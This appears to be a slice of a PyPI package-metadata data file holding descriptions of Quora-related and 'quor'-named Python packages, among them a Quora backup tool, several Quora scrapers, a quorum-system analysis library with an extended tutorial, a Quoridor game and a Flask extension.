Details------------------Your content will be stored in the following files, in whatever directory you run the above command in:answers.csvquestions.csvupvotes.csvquestion_follows.csvThe resulting CSV output will have columns (fields/attributes) delimited by commas and rows (entries) delimited by new lines. 
The first row will be a header row, containing the names of the fields.Specifying an Activity======================You can also specify only one activity to be backed up. For instance, to only back up answers:$ python backup.py --type answers Christopher-J-Su"} +{"package": "quorachallenge", "pacakge-description": "IntroductionThe framework for the Quora development challenges - supporting project description and testing.FeaturesIn Browser display of challenge description/requirementsautomated testing against pre-defined test datadisplay of pre-defined test datadata and description downloaded from central repositoryInstallationInstallation is very simple :$pipinstallquorachallengeTo upgrade an existing installation use$pipinstall--upgradequorachallengeGetting StartedSeeFull Documentationfor information on how to get started, and details of the full framework features.Further InformationFull DocumentationOn PyPi (Python Package Index)Source code on GitHubTroubleshooting & BugsNoteEvery care is taken to try to ensure that this code comes to you bug free.\nIf you do find an error - please report the problem on :GitHub IssuesBy email to :Tony FluryLicenseThis software is covered by the provisions ofMITLicense.BugsEvery care is taken to try to ensure that this code comes to you bug free.\nIf you do find an error - please report the problem on :GitHubor\nby email to :Tony Flury"} +{"package": "quoracle", "pacakge-description": "QuoracleQuoracle is a library for constructing and analyzingread-write quorum\nsystems. Runpip install quoracleand then follow along with the tutorial below to get\nstarted. You can find more information on Quoracle in ourPaPoC '21\npaper.TutorialQuorum SystemsGiven a set of nodesX, aread-write quorum systemis a pair(R, W)whereRis a set of subsets ofXcalledread quorums,Wis a set of subsets ofXcalledwrite quorums, andevery read quorum intersects every write quorum.quoracle allows us to construct and analyze arbitrary read-write quorum\nsystems. First, we import the library.fromquoracleimport*Next, we specify the nodes in our quorum system. Our nodes can be strings,\nintegers, IP addresses, anything!>>>a=Node('a')>>>b=Node('b')>>>c=Node('c')>>>d=Node('d')>>>e=Node('e')>>>f=Node('f')Now, we construct a two by three grid of nodes. Every row is read quorum, and\none element from every row is a write quorum. Note that when we construct a\nquorum system, we only have to specify the set of read quorums. The library\nfigures out the optimal set of write quorums automatically.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)This next code snippet prints out the read quorums.>>>forringrid.read_quorums():...print(r){'a','b','c'}{'d','e','f'}And this next code snippet prints out the write quorums.>>>forwingrid.write_quorums():...print(w){'a','d'}{'a','e'}{'a','f'}{'b','d'}{'b','e'}{'b','f'}{'c','d'}{'c','e'}{'c','f'}Alternatively, we can construct a quorum system be specifying the write\nquorums.>>>QuorumSystem(writes=(a+b+c)*(d+e+f))Or, we can specify both the read and write quorums.>>>QuorumSystem(reads=a*b*c+d*e*f,writes=(a+b+c)*(d+e+f))But, remember that every read quorum must intersect every write quorum. If we\ntry to construct a quorum system with non-overlapping quorums, an exception\nwill be thrown.>>>QuorumSystem(reads=a+b+c,writes=d+e+f)Traceback(mostrecentcalllast):...ValueError:NotallreadquorumsintersectallwritequorumsWe can check whether a given set is a read or write quorum. 
Note that any\nsuperset of a quorum is also considered a quorum.>>>grid.is_read_quorum({'a','b','c'})True>>>grid.is_read_quorum({'a','b','c','d'})True>>>grid.is_read_quorum({'a','b','d'})False>>>>>>grid.is_write_quorum({'a','d'})True>>>grid.is_write_quorum({'a','d','d'})True>>>grid.is_write_quorum({'a','b'})FalseResilienceTheread resilienceof our quorum system is the largest numberfsuch that\ndespite the failure of anyfnodes, we still have at least one read quorum.Write resilienceis defined similarly, andresilienceis the minimum of\nread and write resilience.Here, we print out the read resilience, write resilience, and resilience of our\ngrid quorum system. We can fail any one node and still have a read quorum, but\nif we fail one node from each row, we eliminate every read quorum, so the read\nresilience is 1. Similarly, we can fail any two nodes and still have a write\nquorum, but if we fail one node from every column, we eliminate every write\nquorum, so our write resilience is 1. The resilience is the minimum of 1 and 2,\nwhich is 1.>>>grid.read_resilience()1>>>grid.write_resilience()2>>>grid.resilience()1StrategiesAstrategyis a discrete probability distribution over the set of read and\nwrite quorums. A strategy gives us a way to pick quorums at random. We'll see\nhow to construct optimal strategies in a second, but for now, we'll construct a\nstrategy by hand. To do so, we have to provide a probability distribution over\nthe read quorums and a probability distribution over the write quorums. Here,\nwe'll pick the top row twice as often as the bottom row, and we'll pick each\ncolumn uniformly at random. Note that when we specify a probability\ndistribution, we don't have to provide exact probabilities. We can simply pass\nin weights, and the library will automatically normalize the weights into a\nvalid probability distribution.>>># The read quorum strategy.>>>sigma_r={...frozenset({'a','b','c'}):2.,...frozenset({'d','e','f'}):1.,...}>>>>>># The write quorum strategy.>>>sigma_w={...frozenset({'a','d'}):1.,...frozenset({'b','e'}):1.,...frozenset({'c','f'}):1.,...}>>>strategy=grid.make_strategy(sigma_r,sigma_w)Once we have a strategy, we can use it to sample read and write quorums. Here,\nwe expectget_read_quorumto return the top row twice as often as the bottom\nrow, and we expectget_write_quorumto return every column uniformly at\nrandom.>>>strategy.get_read_quorum(){'a','b','c'}>>>strategy.get_read_quorum(){'a','b','c'}>>>strategy.get_read_quorum(){'d','e','f'}>>>strategy.get_write_quorum(){'b','e'}>>>strategy.get_write_quorum(){'c','f'}>>>strategy.get_write_quorum(){'b','e'}>>>strategy.get_write_quorum(){'a','d'}Load and CapacityTypically in a distributed system, a read quorum of nodes is contacted to\nperform a read, and a write quorum of nodes is contacted to perform a write.\nAssume we have a workload with aread fractionfrof reads and awrite\nfractionfw = 1 - frof writes. Given a strategy, theload of a nodeis\nthe probability that the node is selected by the strategy. Theload of a\nstrategyis the load of the most heavily loaded node. Theload of a quorum\nsystemis the load of the optimal strategy, i.e. the strategy that achieves\nthe lowest load. The most heavily loaded node in a quorum system is a\nthroughput bottleneck, so the lower the load the better.Let's calculate the load of our strategy assuming a 100% read workload (i.e. 
a\nworkload with a read fraction of 1).The load ofais 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofbis 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofcis 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofdis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The load ofeis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The load offis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The largest node load is 2/3, so our strategy has a load of 2/3. Rather than\ncalculating load by hand, we can simply call theloadfunction.>>>strategy.load(read_fraction=1)0.6666666666666666Now let's calculate the load of our strategy assuming a 100% write workload.\nAgain, we calculate the load on every node.The load ofais 1/3 because the write quorum{a, d}is chosen 1/3 of\nthe time.The load ofbis 1/3 because the write quorum{b, e}is chosen 1/3 of\nthe time.The load ofcis 1/3 because the write quorum{c, f}is chosen 1/3 of\nthe time.The load ofdis 1/3 because the write quorum{a, d}is chosen 1/3 of\nthe time.The load ofeis 1/3 because the write quorum{b, e}is chosen 1/3 of\nthe time.The load offis 1/3 because the write quorum{c, f}is chosen 1/3 of\nthe time.The largest node load is 1/3, so our strategy has a load of 1/3. Again, rather\nthan calculating load by hand, we can simply call theloadfunction. Note\nthat we can pass in aread_fractionorwrite_fractionbut not both.>>>strategy.load(write_fraction=1)0.3333333333333333Now let's calculate the load of our strategy on a 25% read and 75% write\nworkload.The load ofais0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{a, d}with 1/3 probability.The load ofbis0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{b, e}with 1/3 probability.The load ofcis0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{c, f}with 1/3 probability.The load ofdis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{a, d}with 1/3 probability.The load ofeis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{b, e}with 1/3 probability.The load offis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{c, f}with 1/3 probability.The largest node load is 5/12, so our strategy has a load of 5/12. At this\npoint, you can see that calculating load by hand is extremely tedious. 
We could\nhave skipped all that work and calledloadinstead!>>>strategy.load(read_fraction=0.25)0.41666666666666663We can also compute the load on every node.>>>print(strategy.node_load(a,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(b,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(c,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(d,read_fraction=0.25))0.3333333333333333>>>print(strategy.node_load(e,read_fraction=0.25))0.3333333333333333>>>print(strategy.node_load(f,read_fraction=0.25))0.3333333333333333Our strategy has a load of 5/12 on a 25% read workload, but what about the\nquorum system? The quorum system doesnothave a load of 5/12 because our\nstrategy is not optimal. We can call thestrategyfunction to compute the\noptimal strategy automatically.>>>strategy=grid.strategy(read_fraction=0.25)>>>strategyStrategy(reads={('a','b','c'):0.5,('d','e','f'):0.5},writes={('a','f'):0.33333333,('b','e'):0.33333333,('c','d'):0.33333333})>>>strategy.load(read_fraction=0.25))0.3749999975Here, we see that the optimal strategy picks all rows and all columns\nuniformly. This strategy has a load of 3/8 on the 25% read workload. Since this\nstrategy is optimal, that means our quorum system also has a load of 3/8 on a\n25% workload.We can also query this strategy's load on other workloads as well. Note that\nthis strategy is optimal for a read fraction of 25%, but it may not be optimal\nfor other read fractions.>>>strategy.load(read_fraction=0)0.33333333>>>strategy.load(read_fraction=0.5)0.416666665>>>strategy.load(read_fraction=1)0.5We can also use a quorum system'sloadfunction. The code snippet below is a\nshorthand forgrid.strategy(read_fraction=0.25).load(read_fraction=0.25).>>>grid.load(read_fraction=0.25)0.3749999975The capacity of strategy or quorum is simply the inverse of the load. Our\nquorum system has a load of 3/8 on a 25% read workload, so it has a capacity of\n8/3.>>>grid.capacity(read_fraction=0.25)2.6666666844444444Thecapacityof a quorum system is proportional to the maximum throughput\nthat it can achieve before a node becomes bottlenecked. Here, if every node\ncould process 100 commands per second, then our quorum system could process\n800/3 commands per second.Workload DistributionsIn the real world, we don't often have a workload with a fixed read fraction.\nWorkloads change over time. Instead of specifying a fixed read fraction, we can\nprovide a discrete probability distribution of read fractions. Here, we say\nthat the read fraction is 10% half the time and 75% half the time.strategywill return the strategy that minimizes the expected load according to this\ndistribution.>>>distribution={0.1:1,0.75:1}>>>strategy=grid.strategy(read_fraction=distribution)>>>strategy.load(read_fraction=distribution)0.40416666474999996Heterogeneous NodeIn the real world, not all nodes are equal. We often run distributed systems on\nheterogeneous hardware, so some nodes might be faster than others. To model\nthis, we instantiate every node with its capacity. Here, nodesa,c, andecan process 1000 commands per second, while nodesb,d, andfcan\nonly process 500 requests per second.>>>a=Node('a',capacity=1000)>>>b=Node('b',capacity=500)>>>c=Node('c',capacity=1000)>>>d=Node('d',capacity=500)>>>e=Node('e',capacity=1000)>>>f=Node('f',capacity=500)Now, the definition of capacity becomes much simpler. The capacity of a quorum\nsystem is simply the maximum throughput that it can achieve. The load can be\ninterpreted as the inverse of the capacity. 
Here, our quorum system is capable\nof processing 1333 commands per second for a workload of 75% reads.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)>>>strategy=grid.strategy(read_fraction=0.75)>>>strategy.load(read_fraction=0.75)0.00075>>>strategy.capacity(read_fraction=0.75)1333.3333333333333Nodes might also process reads and writes at different speeds. We can specify\nthe peak read and write throughput of every node separately. Here, we assume\nreads are ten times as fast as writes.>>>a=Node('a',write_capacity=1000,read_capacity=10000)>>>b=Node('b',write_capacity=500,read_capacity=5000)>>>c=Node('c',write_capacity=1000,read_capacity=10000)>>>d=Node('d',write_capacity=500,read_capacity=5000)>>>e=Node('e',write_capacity=1000,read_capacity=10000)>>>f=Node('f',write_capacity=500,read_capacity=5000)With 100% reads, our quorum system can process 10,000 commands per second.\nThis throughput decreases as we increase the fraction of writes.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)>>>grid.capacity(read_fraction=1)10000.0>>>grid.capacity(read_fraction=0.5)3913.043450018904>>>grid.capacity(read_fraction=0)2000.0f-resilient StrategiesAnother real world complication is the fact that machines sometimes fail and\nare sometimes slow. If we contact a quorum of nodes, some of them may fail, and\nwe'll get stuck waiting to hear back from them. Or, some of them may be\nstragglers, and we'll wait longer than we'd like. We can address this problem\nby contacting more than the bare minimum number of nodes.Formally, we say a read quorum (or write quorum) q isf-resilientif\ndespite the failure of anyfnodes, q still forms a read quorum (or write\nquorum). A strategy isf-resilient if it only selectsf-resilient quorums.\nBy default,strategyreturns0-resilient quorums. We can pass in thefargument to get more resilient strategies.>>>strategy=grid.strategy(read_fraction=0.5,f=1)These sets are quorums even if 1 machine fails.>>>strategy.get_read_quorum(){'b','f','e','d','a','c'}>>>strategy.get_write_quorum(){'b','d','a','e'}Note that as we increase resilience, quorums get larger, and we decrease\ncapacity. On a 100% write workload, our grid quorum system has a 0-resilient\ncapacity of 2000 commands per second, but a 1-resilient capacity of 1000\ncommands per second.>>>grid.capacity(write_fraction=1,f=0)2000.0>>>grid.capacity(write_fraction=1,f=1)1000.0Also note that not all quorum systems are equally as resilient. In the next\ncode snippet, we construct a \"write 2, read 3\" quorum system using thechoosefunction. For this quorum system, every set of 2 nodes is a write quorum, and\nevery set of 3 nodes is a read quorum. This quorum system has a 0-resilient\ncapacity of 2000 (the same as the grid), but a 1-resilient capacity of 1333\n(higher than the grid).>>>write2=QuorumSystem(writes=choose(2,[a,b,c,d,e]))>>>write2.capacity(write_fraction=1,f=0)2000.0>>>write2.capacity(write_fraction=1,f=1)1333.3333333333333LatencyIn the real world, not all nodes are equally as far away. Some are close and\nsome are far. To address this, we associate every node with a latency, i.e. the\ntime the required to contact the node. We model this in quoracle by assigning\neach node a latency, represented as adatetime.timedelta. 
Here, nodesa,b,c,d,e, andfin our grid have latencies of 1, 2, 3, 4, 5, and 6\nseconds.>>>importdatetime>>>>>>defseconds(x:int)->datetime.timedelta:>>>returndatetime.timedelta(seconds=x)>>>>>>a=Node('a',write_capacity=1000,read_capacity=10000,latency=seconds(1))>>>b=Node('b',write_capacity=500,read_capacity=5000,latency=seconds(2))>>>c=Node('c',write_capacity=1000,read_capacity=10000,latency=seconds(3))>>>d=Node('d',write_capacity=500,read_capacity=5000,latency=seconds(4))>>>e=Node('e',write_capacity=1000,read_capacity=10000,latency=seconds(5))>>>f=Node('f',write_capacity=500,read_capacity=5000,latency=seconds(6))>>>grid=QuorumSystem(reads=a*b*c+d*e*f)Thelatency of a quorumqis the time required to form a quorum of\nresponses after contacting every node inq. For example, the read quorum{a, b, c}has a latency of three seconds. It takes 1 second to hear back froma,\nanother second to hear back fromb, and then a final second to hear back fromc. The write quorum{a, b, d, f}has a latency of 4 seconds. It takes 1\nsecond to hear back froma, another second to hear back fromb, and then\nanother 2 seconds to hear back fromd. The set{a, b, d}is a write quorum,\nso the latency of this quorum is 4 seconds. Note that we didn't have to wait to\nhear back fromfin order to form a quorum.Thelatency of a strategyis the expected latency of the quorums that it\nchooses. Thelatency of a quorum systemis the latency of the latency-optimal\nstrategy. We can use thestrategyfunction to find a latency-optimal strategy\nby passing in the value\"latency\"to theoptimizeflag.>>>sigma=grid.strategy(read_fraction=0.5,optimize='latency')>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('c','d'):1.0})We can find the latency of this strategy by calling thelatencyfunction.>>>sigma.latency(read_fraction=1)0:00:03>>>sigma.latency(read_fraction=0)0:00:04>>>sigma.latency(read_fraction=0.5)0:00:03.500000As with capacity, we can call thelatencyfunction on our quorum system\ndirectly. In the follow code snippetgrid.latency(read_fraction=0.5, optimize='latency')is a shorthand forgrid.strategy(read_fraction=0.5, optimize='latency').latency(read_fraction=0.5).>>> grid.latency(read_fraction=0.5, optimize='latency')\n0:00:03.500000Note that finding the latency-optimal strategy is trivial. The latency-optimal\nstrategy always selects the read and write quorum with the smallest latencies.\nHowever, things get complicated when we start optimizing for capacity and\nlatency at the same time. When we call thestrategyfunction withoptimize='latency', we can pass in a constraint on the maximum allowable load\nusing theload_limitargument. For example, in the code snippet below, we\nfind the latency-optimal strategy with a capacity of at least 1,500.>>>sigma=grid.strategy(read_fraction=0.5,...optimize='latency',...load_limit=1/1500)>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('a','d'):0.66666667,('c','e'):0.33333333})>>>sigma.capacity(read_fraction=0.5)1499.9999925>>>sigma.latency(read_fraction=0.5)0:00:03.666667This strategy always picks the read quorum{a, b, c}, and picks the write\nquorum{a, d}twice as often as write quorum{c, e}. It achieves our\ndesired capacity of 1,500 commands per second (ignoring rounding errors) and\nhas a latency of 3.66 seconds. 
We can also find a load-optimal strategy with a\nlatency constraint.>>>sigma=grid.strategy(read_fraction=0.5,...optimize='load',...latency_limit=seconds(4))>>>sigmaStrategy(reads={('a','b','c'):0.98870056,('d','e','f'):0.011299435},writes={('a','d'):0.19548023,('a','f'):0.22429379,('b','d'):0.062711864,('b','e'):0.097740113,('c','e'):0.41977401})>>>sigma.capacity(read_fraction=0.5)3856.2090893331633>>>sigma.latency(read_fraction=0.5)0:00:04.000001This strategy is rather complicated and would be hard to find by hand. It has a\ncapacity of 3856 commands per second and achieves our latency constraint of 4\nseconds.Be careful when specifying constraints. If the constraints cannot be met, aNoStrategyFoundexception is raised.>>>grid.strategy(read_fraction=0.5,...optimize='load',...latency_limit=seconds(1))Traceback(mostrecentcalllast):...quoracle.quorum_system.NoStrategyFoundError:nostrategysatisfiesthegivenconstraintsNetwork LoadAnother useful metric is network load. When a protocol performs a read, it has\nto send messages to every node in a read quorum, and when a protocol performs a\nwrite, it has to send messages to every node in a write quorum. The bigger the\nquorums, the more messages are sent over the network. Thenetwork load of a\nquorumis simply the size of the quorum, thenetwork load of a strategyis\nthe expected network load of the quorums it chooses, and thenetwork load of a\nquorum systemis the network load of the network load-optimal strategy.We can find network load optimal-strategies using thestrategyfunction by\npassing in\"network\"to theoptimizeflag. We can also specify constraints\non load and latency. In general, using thestrategyfunction, we can pick one\nof load, latency, or network load to optimize and specify constraints on the\nother two metrics.>>>sigma=grid.strategy(read_fraction=0.5,optimize='network')>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('c','f'):1.0})>>>sigma.network_load(read_fraction=0.5)2.5>>>grid.network_load(read_fraction=0.5,optimize='network')2.5>>>sigma=grid.strategy(read_fraction=0.5,...optimize='network',...load_limit=1/2000,...latency_limit=seconds(4))SearchFinding good quorum systems by hand is hard. quoracle includes a heuristic\nbased search procedure that tries to find quorum systems that are optimal with\nrespect a target metric and set of constraints. For example, lets try to find a\nquorum systemthat has resilience 1,that is 1-resilient load optimal for a 75% read workload,that has a latency of most 4 seconds, andthat has a network load of at most 4.Because the number of quorum systems is enormous, the search procedure can take\na very, very long time. We pass in a timeout to the search procedure to limit\nhow long it takes. 
If the timeout expires,searchreturns the most optimal\nquorum system that it found so far.### Search>>>qs,sigma=search(nodes=[a,b,c,d,e,f],...resilience=1,...f=1,...read_fraction=0.75,...optimize='load',...latency_limit=seconds(4),...network_limit=4,...timeout=seconds(60))>>>qsQuorumSystem(reads=choose3(a,c,e,(b+d+f)),writes=choose2(a,c,e,(b*d*f)))>>>sigmaStrategy(reads={('a','c','e','f'):0.33333333,('a','b','c','e'):0.33333333,('a','c','d','e'):0.33333333},writes={('a','b','c','d','f'):0.15714286,('b','c','d','e','f'):0.15714286,('a','c','e'):0.52857143,('a','b','d','e','f'):0.15714286})>>>sigma.capacity(read_fraction=0.75)3499.9999536250007>>>sigma.latency(read_fraction=0.75)0:00:03.907143>>>sigma.network_load(read_fraction=0.75)3.9857142674999997Here, the search procedure returns the quorum systemchoose(3, [a, c, e, b+d+f])with a capacity of 3500 commands per second and with latency and\nnetwork load close to the limits specified.Publishing To pypiFirst, bump the version insetup.py. Then, run the following where $VERSION\nis the current version insetup.py.python -m unittest\npython -m build\npython -m twine upload dist/quoracle-$VERSION*"} +{"package": "quora-profile-search", "pacakge-description": "No description available on PyPI."} +{"package": "quorapy", "pacakge-description": "quorapy.. image::https://travis-ci.org/djunehor/quorapy.svg?branch=master:target:https://travis-ci.org/djunehor/quorapy:alt: Build Status.. image::http://hits.dwyl.io/djunehor/quorapy.svg:target:http://hits.dwyl.io/djunehor/quorapy:alt: HitCountIssues and pull requests welcome.A Python module to fetch and parse data from Quora.\n\nTable of Contents\n^^^^^^^^^^^^^^^^^\n\n\n* `Installation <#installation>`_\n* `Usage <#usage>`_\n* `Features <#features>`_\n* `Contribute <#contribute>`_\n\nInstallation\n------------\n\nYou will need `Python 3.x `_ and `pip `_.\n\nInstall using pip: ``pip install quorapy``\nInstall via repo:\n\n\n* Clone repor ``git clone https://github.com/djunehor/quorapy``\n* Install requirements via ``pip install -r requirements.txt``\n* Place quorapy in your project root folder\n\nUsage\n-----\n\n.. 
code-block:: python\n\n from quorapy import Quora\n import os\n from quorapy.browser import Browser\n\n browser = Browser(os.getenv('LINUX'))\n quora = Quora(browser)\n\n # search for `Python`\n results = quora.search('Python')\n\n # Sample response:\n { \"answer_limit\": 1,\n \"data\": [\n {\n \"comments\": [\n {\n \"text\": \"Rather than giving you a boring step by step process of learning Python, I would share my personal journey about how I started learning Python.\\nHere is my personal learning experience:\\nWhat motivated me to start learn Python ?\\nI fell in love with Python after reading a bunch of answers on Quora about how people were doing wonderful things with Python.\\nSome were writing scripts to automate their Whats app messages.\\nSome wrote a script to download their favourite songs,\\nwhile some built a system to receive cricket score updates on their phones.\\nAll of this seemed very excited to me and I finally dec...(more)\",\n \"user\": {\n \"datetime\": \"2019-09-29 02:52:30.692237\",\n \"name\": \"\",\n \"url\": \"https://www.quora.com/profile/Neha-Ahuja-178\"\n }\n }\n ],\n \"question\": {\n \"datetime\": \"2019-09-28 23:57:00\",\n \"text\": \"How should I start learning Python?\",\n \"user\": {\n \"name\": \"Quora Content Review\",\n \"url\": \"https://quora.com/profile/Quora-Content-Review\"\n }\n },\n \"url\": \"https://www.quora.com/How-should-I-start-learning-Python-1\"\n }\n ],\n \"load_user\": null,\n \"query\": \"python\",\n \"question_limit\": 1\n }\n\nFeatures\n--------\n\nCurrently implemented\n^^^^^^^^^^^^^^^^^^^^^\n\n\n* Search\n\nContribute\n----------\n\nCheck out the issues on GitHub and/or make a pull request to contribute!"} +{"package": "quoras", "pacakge-description": "quorasA Python package to collect data from Quora.InstallationThe package is available on PyPI. Simply run the following command:pip install quorasSetupCreate a folder calledchrome_pathin the same directory as your source file. Download the ChromeDriver fromhereand place thechromedriver.exefile in the newly created folder.InitializeYou need to have account on Quora (or its language-specific forum) to collect data from it. Initialize the Quora class as following providing your credentials and language code. The language codes can be foundhere.quora = Quora ('email-address', 'password', 'language-code')UsageThis package allows you to call several functions. Search with keywords for questions, topics or users with functionsearch(keyword, type='post', scroll_count=1). Changetypeto'topic'or'user'to search topic RSS pages or user profiles respectively. You can pass a value forscroll_countto control how many scrolls the web browser will automatically do.posts = quora.search('ancient history', 'post', scroll_count=1)\ntopics = quora.search('finance', 'topic', scroll_count=1)\nusers = quora.search('Dipto Das', 'user', scroll_count=1)There are alternative ways to search posts or users. You can callsearch_posts(keyword, scroll_count=1)function that searches for posts with specified keyword without requiring explicitly indicating type. Similarly,search_users(keyword, scroll_count=1)function to search users containing keyword in their profile names. 
You can also pass a value forscroll_countto control how many scrolls the web browser will automatically do.questions = quora.search_posts('ancient history', scroll_count=1)\nusers = quora.search_users('Dipto Das', scroll_count=1)To search for Q/A threads with a specific user-assigned topic tag, you can simply callsearch_topic(topic, scroll_count=1)function as follows:topic_questions = search_topic('politics', scroll_count=5)If you already have an url, you can directly search details about that entry. If it is an url to a Q/A thread, then it will return the question, topics, answers, participating users, and Quora suggested related questions. If it is an url to a user profile, then it will return statistics about the user (e.g., number of public answers, number of questions, number of shares, number of posts, number of followings, and number of followers), and links to top (defined by Quora) posts from the user. To use this function, you have to callsearch_url(url)function.qathread_details = quora.search_url('https://bn.quora.com/\u0986\u09b8\u09be\u09ae\u0995\u09c7-\u0995\u09c7\u09a8-\u09b8\u09ac\u09be\u0987-\u0985\u09b8\u09ae-\u09ac\u09b2\u099b\u09c7')\nuser_details = quora.search_url('https://www.quora.com/profile/Dipto-Das-1')Importantly, quoras can can retrieve the full text in an answer given its url. For that, you need to callget_full_answer(url)function as following:full_answer = quora.get_full_answer('https://bn.quora.com/\u09ac\u09bf\u099c\u09cd\u099e\u09be\u09a8\u09c0\u09a6\u09c7\u09b0-\u09ae\u09a7\u09cd\u09af\u09c7\u0993-\u0995\u09bf/answers/150612153')"} +{"package": "quora-scraper", "pacakge-description": "Quora-scraperQuora-scraper is a command-line application written in Python that scrapes Quora. It simulates a browser environment to let you scrape Quora rich textual data. You can use one of the three scraping modules to: Find questions that discuss about certain topics (such as Finance, Politics, Tesla or Donald-Trump). Scrape Quora answers related to certain questions, or scrape users profile. Please use it responsibly !InstallTo use our scraper, please follow the steps below:Install python 3.6 or upper versions.Install the latest version of google-chrome.Download chromedriver and add it to your sys path:https://sites.google.com/a/chromium.org/chromedriver/homeInstall quora-scraper:$pipinstallquora-scraperTo update quora-scraper:$pipinstallquora-scraper--upgradeAlternatively, you can clone the project and run the following command to install: Make sure you cd into the quora-scraper folder before performing the command below.$pythonsetup.pyinstallUsagequora-scraper has three scraping modules :questions,answers,users.1) Scraping questions URL:You can scrape questions related to certain topics usingquestionscommand. This module takes as an input a list of topic keywords. Output is a questions_URL file containing the topic's question links.Scraping a topic questions can be done as follows:a) Use -l parameter + topic keywords list.$quora-scraperquestions-l[finance,politics,Donald-Trump]b) Use -f parameter + topic keywords file location. (keywords must be line separated inside the file):$quora-scraperquestions-ftopics_file.txt2) Scraping answers:Quora answers are scraped usinganswerscommand. This module takes as an input a list of Questions URL. Output is a file of scraped answers (answers.txt). 
An answer consists of :Quest-ID | AnswerDate | AnswerAuthor-ID | Quest-tags | Answer-TextTo scrape answers, use one of the following methods:a) Use -l parameter + question URLs list.$quora-scraperanswers-l[https://www.quora.com/Is-milk-good,https://www.quora.com/Was-Einstein-a-fake-and-a-plagiarist]b) Use -f parameter + question URLs file location:$quora-scraperanswers-fquestions_url.txt3) Scraping Quora user profile:You can scrape Quora Users profile usinguserscommand. The users module takes as an input a list of Quora user IDs. The output is UserProfile file containing:First line :\nUserID | ProfileDescription |ProfileBio | Location | TotalViews |NBAnswers | NBQuestions | NBFollowers | NBFollowingRemaining lines (User's answers):\nAnswerDate | QuestionID | AnswerTextScraping Users profile can be done as follows:a) Use -l parameter + User-IDs list.$quora-scraperusers-l[Albert-Einstein-195,Jackie-Chan-8]b) Use -f parameter + User-IDs file.$quora-scraperusers-fquora_username_file.txtNotesa) Input files must be line separated.b) Output files fields are tab separated.c) You can add a list/line index parameter In order to start the scraping from that index. The code below will start scraping from \"physics\" keyword:sh $ quora-scraper questions -l [finance,politics,tech,physics,life,sports] -i 3d) Quora website puts limit on the number of questions accessible on a topic page. Thus, even if a topic has a large number of questions (ex: 100k), the number scraped questions links will not exceed 2k or 3k questions.e) For more help use :$quora-scraper--helpf) Quora-scraper uses xpaths and bs4 methods to scrape Quora webpage elements. Since Quora HTML Structure is constantly changing, the code may need modification from time to time. Please feel free to update and contribute to the source-code in order to keep the scraper up-to-date.LicenseThis project uses the following license:MIT"} +{"package": "quoridor", "pacakge-description": "Quoridor OnlineClient and server to play the strategy board gameQuoridor. It usespygame.InstallRequires: Python >=3.6.\nTo install, open a command prompt and launch:pip3installquoridorUseTo launch a server:python3-mquoridor.server[HOST][PORT][NUM_PLAYERS]HOST: IP addressPORT: port numberNUM_PLAYERS: number of players (2, 3 or 4)To launch a client:python3-mquoridor.client[HOST][PORT]HOST and PORT must be the same as the server.PlayYou can see the rules of the gamehere:To move your pawn, use the four arrow keysTo place a fence, click on the game boardAt the end of the game, you can restart a game. Just click on the \"Restart\" button.Pathfinding algorithmA pathfinding algorithm is used to check if a player is blocked or not. 
Thanks to thepython-pathfindingproject.ContactQuentin Deschamps:quentindeschamps18@gmail.comLicenseMIT"} +{"package": "quorra", "pacakge-description": "A python wrapper aroundquorra.js, for creating reusable visualizations.InstallationCurrently, the best way to install this repository is directly from the source:gitclonehttp://github.com/bprinty/quorra-python.gitcdquorra-pythonpythonsetup.pyinstallUsageComing soon \u2026In the meantime, here\u2019s a snippit of how to generate a toy plot:>>>importquorra>>>importpandas>>>importrandom>>>data=pandas.DataFrame({>>>'x':[iforiinrange(0,10)],>>>'y':[round(random.gauss(100,10),2)foriinrange(0,10)],>>>'group':['data']*10>>>})>>>plt=quorra.line().data(>>>data,>>>x='x',>>>y='y',>>>group='group'>>>).xlabel('Index').ylabel('Random Value')>>>quorra.render(plt)Questions/FeedbackFile an issue in theGitHub issue tracker."} +{"package": "quorum", "pacakge-description": "A small extension framework for Flask to easy a series of simple tasks.Usageimportflaskimportquorumapp=quorum.load(name=__name__)@app.route(\"/\",methods=(\"GET\",))defindex():returnflask.render_template(\"index.html.tpl\")if__name__==\"__main__\":quorum.run()Creation of background callables, that will execute every one second in a separate thread@quorum.background(timeout=1.0)defhello_recursive():print(\"hello word\")Buildingsphinx-build-bhtmldocdoc/_buildDocumentationExtra documentation is available under our readthedocs.compage. Keep\nin mind that some delay may exist between the current repositorymasterversion and the documentation.We need people to help documentation the code base if you know anyone please contact us.Build Automation"} +{"package": "quorum-data-py", "pacakge-description": "Python Data for Apps of QuoRumquorum \u5e38\u7528\u6570\u636e\u7ed3\u6784\u7684 python 